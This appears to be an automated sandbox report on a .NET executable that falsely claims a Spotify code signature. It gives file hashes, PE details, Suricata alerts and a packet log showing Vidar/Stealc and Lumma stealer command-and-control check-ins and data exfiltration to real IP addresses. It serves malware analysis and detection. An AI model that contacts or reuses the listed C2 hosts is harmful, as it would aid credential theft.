Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.\|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:ttG:TG
MD5:	CE62DE8B939A0DB9A291DAC456DDBE29
SHA1:	947922B45B944998DBF3A780392441C3DB66F067
SHA-256:	84551EDE18E3907C5901A3131078014281EB48B5025FA8F3206D9609B61F5DBF
SHA-512:	366C1058728B22849EC280CC619EDC7E4271445895B15EEBDEC3D02F0E7E9F7F3B6C539ADFF910DA20DE69B5580E1C2446E6531DDC7E744D37010FEB5F480501
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.991658403046229
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	411'512 bytes
MD5:	6b082832f014548bf1703ddaed1e16b9
SHA1:	93d4d923d2dc2869e7aeb8cf919490087113b838
SHA256:	036fc1946493ce413024f5b8094bddc99f2a22e0e31ff93b63015b020cbff0e6
SHA512:	fe48b376be766314b000fa557e4e3dac013b8cc8e82637df3fc9f442dd2f858998f894232fecd65e6e3baf0d2e1bb423c1a8515cda7a870c3baec77d207f4936
SSDEEP:	12288:0K1t63MtALzhRqhiBsr8MxYXX9J56TWdgM9FlX:0K1t68tALzm6/MxsXwWdV
TLSH:	499423D889641929FC971E3068DA5375FF31374B483362F3538AEA44069BF442BF26B9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U3.f............................~3... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46337e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66ED3355 [Fri Sep 20 08:33:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/09/2022 01:00:00 20/10/2023 00:59:59
Subject Chain	CN=Spotify AB, O=Spotify AB, L=Stockholm, C=SE, SERIALNUMBER=5567037485, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE
Version:	3
Thumbprint MD5:	EF8873EED657F2DFE432077ADBAB8AFB
Thumbprint SHA-1:	3F76C6CC576963831FF44303BFCB98113C51C95E
Thumbprint SHA-256:	890C79F427B0C07DEF096FF66A402E9337F0F2D80DACA1256A7F572F7720DBAA
Serial:	04C530703A210EC1D6F83CB4FE1118C5

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6332c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x61e00	0x2978
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x631f4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61384	0x61400	ff131c589fe6ed9b7152753dd5caae44	False	0.9952979394280206	data	7.997245276526226	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5d0	0x600	64e4ef4b07f98522feb20d14dbb4d621	False	0.4342447916666667	data	4.130821355695459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	12e5e788d1b6ee25f4400903f7231639	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x340	data			0.4411057692307692
RT_MANIFEST	0x643e0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-20T11:07:25.933762+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49738	116.203.165.127	443	TCP
2024-09-20T11:07:27.086417+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49739	116.203.165.127	443	TCP
2024-09-20T11:07:28.455913+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49740	116.203.165.127	443	TCP
2024-09-20T11:07:29.814677+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49741	116.203.165.127	443	TCP
2024-09-20T11:07:30.519693+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49741	116.203.165.127	443	TCP
2024-09-20T11:07:30.519925+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.165.127	443	192.168.2.4	49741	TCP
2024-09-20T11:07:31.172777+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49742	116.203.165.127	443	TCP
2024-09-20T11:07:31.853484+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.165.127	443	192.168.2.4	49742	TCP
2024-09-20T11:07:32.592621+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49743	116.203.165.127	443	TCP
2024-09-20T11:07:33.700459+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49744	116.203.165.127	443	TCP
2024-09-20T11:07:36.790169+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49745	116.203.165.127	443	TCP
2024-09-20T11:07:38.297862+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49746	116.203.165.127	443	TCP
2024-09-20T11:07:39.454980+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49747	116.203.165.127	443	TCP
2024-09-20T11:07:40.560393+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49748	116.203.165.127	443	TCP
2024-09-20T11:07:41.501794+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49749	116.203.165.127	443	TCP
2024-09-20T11:07:43.229454+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49750	116.203.165.127	443	TCP
2024-09-20T11:07:44.932774+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49751	116.203.165.127	443	TCP
2024-09-20T11:07:46.482079+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49752	116.203.165.127	443	TCP
2024-09-20T11:07:47.900520+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49753	116.203.165.127	443	TCP
2024-09-20T11:07:49.153157+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49754	116.203.165.127	443	TCP
2024-09-20T11:07:52.144396+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49755	116.203.165.127	443	TCP
2024-09-20T11:07:53.384680+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49756	116.203.165.127	443	TCP
2024-09-20T11:07:54.725760+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49757	116.203.165.127	443	TCP
2024-09-20T11:07:56.111092+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49758	116.203.165.127	443	TCP
2024-09-20T11:07:58.156199+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49760	116.203.165.127	443	TCP
2024-09-20T11:08:00.161642+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49761	116.203.165.127	443	TCP
2024-09-20T11:08:01.565896+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49762	147.45.44.104	80	TCP
2024-09-20T11:08:02.908676+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49763	116.203.165.127	443	TCP
2024-09-20T11:08:04.471344+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49764	172.67.204.62	443	TCP
2024-09-20T11:08:04.471344+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49764	172.67.204.62	443	TCP
2024-09-20T11:08:04.516344+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49765	116.203.165.127	443	TCP
2024-09-20T11:08:05.439011+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49766	104.21.88.61	443	TCP
2024-09-20T11:08:05.439011+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49766	104.21.88.61	443	TCP
2024-09-20T11:08:05.990808+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.4	49767	45.132.206.251	80	TCP
2024-09-20T11:08:06.347042+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-20T11:08:06.347042+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-20T11:08:07.321284+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49770	188.114.97.3	443	TCP
2024-09-20T11:08:07.321284+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49770	188.114.97.3	443	TCP
2024-09-20T11:08:08.236847+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-20T11:08:08.236847+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-20T11:08:09.366336+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49772	104.21.75.242	443	TCP
2024-09-20T11:08:09.366336+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49772	104.21.75.242	443	TCP
2024-09-20T11:08:10.276797+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49773	188.114.96.3	443	TCP
2024-09-20T11:08:10.276797+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49773	188.114.96.3	443	TCP
2024-09-20T11:08:11.178841+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49774	188.114.96.3	443	TCP
2024-09-20T11:08:11.178841+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49774	188.114.96.3	443	TCP
2024-09-20T11:08:12.104621+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49775	172.67.192.105	443	TCP
2024-09-20T11:08:12.104621+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49775	172.67.192.105	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2024 11:07:23.759748936 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:23.759793043 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:23.761038065 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:23.769295931 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:23.769315958 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.414062023 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.414150953 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:24.482388020 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:24.482412100 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.482834101 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.482903004 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:24.487483978 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:24.531404972 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.915838957 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.915904045 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.915946960 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.916100025 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:24.916100025 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:24.916127920 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:24.916188955 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.005362988 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.005495071 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.005515099 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.005534887 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.005554914 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.005578041 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.021013975 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.021116018 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.021120071 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.021138906 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.021169901 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.021183968 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.021187067 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.021243095 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.021665096 CEST	49737	443	192.168.2.4	23.50.98.133
Sep 20, 2024 11:07:25.021682024 CEST	443	49737	23.50.98.133	192.168.2.4
Sep 20, 2024 11:07:25.032401085 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.032438040 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:25.032944918 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.033093929 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.033104897 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:25.933660030 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:25.933762074 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.938565969 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.938570976 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:25.938962936 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:25.939065933 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.939462900 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:25.987399101 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:26.430815935 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:26.430922985 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.430936098 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:26.430985928 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:26.430991888 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.431046009 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.433651924 CEST	49738	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.433665991 CEST	443	49738	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:26.436841011 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.436896086 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:26.436988115 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.437199116 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:26.437221050 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.086316109 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.086416960 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.087007046 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.087019920 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.089189053 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.089195967 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.786199093 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.786371946 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.786449909 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.786623001 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.786623001 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.788562059 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.788604975 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:27.788712978 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.788969994 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:27.788985968 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:28.086968899 CEST	49739	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:28.087007046 CEST	443	49739	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:28.455774069 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:28.455913067 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:28.456593037 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:28.456602097 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:28.459203959 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:28.459213972 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.137291908 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.137406111 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.137478113 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.137507915 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.137521982 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.137548923 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.137559891 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.137604952 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.137902975 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.137922049 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.139605045 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.139652014 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.139739037 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.139985085 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.139996052 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.814583063 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.814677000 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.815279007 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.815291882 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:29.817241907 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:29.817253113 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.519701004 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.519731045 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.519773960 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.519799948 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.519810915 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.519812107 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.519835949 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.519865036 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.520143986 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.520159006 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.521775961 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.521796942 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:30.521857023 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.522078991 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:30.522089005 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.172339916 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.172776937 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.244682074 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.244707108 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.247414112 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.247421980 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.853034019 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.853140116 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.853163958 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.853210926 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.853213072 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.853270054 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.853426933 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.853445053 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.926049948 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.926090956 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:31.926218033 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.926424980 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:31.926439047 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:32.592509031 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:32.592621088 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.593215942 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.593224049 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:32.595109940 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.595115900 CEST	443	49743	116.203.165.127	192.168.2.4
